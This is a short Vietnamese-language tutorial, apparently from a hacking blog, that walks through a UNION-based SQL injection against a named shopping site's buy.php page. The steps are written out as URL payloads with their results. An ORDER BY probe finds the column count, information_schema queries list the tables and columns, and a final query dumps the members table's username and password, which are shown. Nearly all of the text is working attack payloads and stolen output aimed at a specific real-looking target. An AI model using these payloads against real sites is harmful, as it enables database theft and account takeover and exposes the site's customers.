tut ko có use và admin

B1:TIM VITIM http://www.pushingpetals.com/buy.php?id=-55
B2:http://www.pushingpetals.com/buy.php?id=-55
B3:http://www.pushingpetals.com/buy.php?id=55 ORDER BY 13--
L?I
B4:http://www.pushingpetals.com/buy.php?id=-55 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12--

2

Description: 3

B5:http://www.pushingpetals.com/buy.php?id=-55 UNION SELECT 1,2,unhex(hex(group_concat(TABLE_name))),4,5,6,7,8,9,10,11,12 from information_schema.TABLEs where table_schema=database()--
RA:Description:
creb conference,customer,localpushingpetalsorders,members,pushingpetals,pushingpetalsorders,user 
B6:http://www.pushingpetals.com/buy.php?id=-55 UNION SELECT 1,2,unhex(hex(group_concat(column_name))),4,5,6,7,8,9,10,11,12 from information_schema.columns where table_schema=database()--
 KO RA ADMIN,nhưng có USER TA B?T BU?C TÌM MEMBER

2

Description: ticket,first name,last name,phone,email,company,website,registration id,twitter,cust_id,name,address,id,name,description,small,medium,large,smallimg,largeimg,type,other,other2,other3,id,username,password,id,firstName,lastName,cellNumber,workNumber,emailHome,emailWork,relationshipStatus,spousesFirstName,homeAddress,workAddress,specialAddress,prefferedMethodOfContactPhoneWork,prefferedMethodOfContactPhoneHome,prefferedMethodOfContactEmailHome,prefferedMethodOfContactEmailWork,prefferedMethodOfContactOther,anythingElse,spouseIs,password,passwordConfirm,passwordNew,loginNew,id,name,description,small,medium,large,smallimg,largeimg,type,other,other2,other3,id,name,Last,ticket#

B7:http://www.pushingpetals.com/buy.php?id=-55 UNION SELECT 1,2,unhex(hex(group_concat(username,password))),4,5,6,7,8,9,10,11,12 from members
--
ra kết quả:

2

Description: john1234,Jacob123

Related Post: